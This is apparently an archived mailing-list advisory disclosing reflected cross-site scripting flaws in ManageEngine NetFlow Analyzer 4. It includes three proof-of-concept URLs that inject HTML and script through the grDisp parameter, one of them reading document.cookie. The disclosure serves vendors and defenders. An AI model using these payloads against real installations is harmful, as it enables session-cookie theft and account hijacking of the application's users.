<<< Date Index >>>     <<< Thread Index >>>

NetFlow Analyzer 4 XSS Vulnerability



NetFlow Analyzer 4
http://manageengine.adventnet.com/products/netflow/

I encountered Cross Site Scripting Vulnerabilities in some files of the NetFlow 
Analyzer 4, with this files, sending a specially crafted url you can execute 
commands in the client side.

____Proof of Concept______

http://192.168.10.7:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=<h1>test</h1>
http://192.168.10.7:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=<script>alert("test")</script>
http://192.168.10.7:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=<script>alert(document.cookie)</script>


Why, why@xxxxxxxxxxx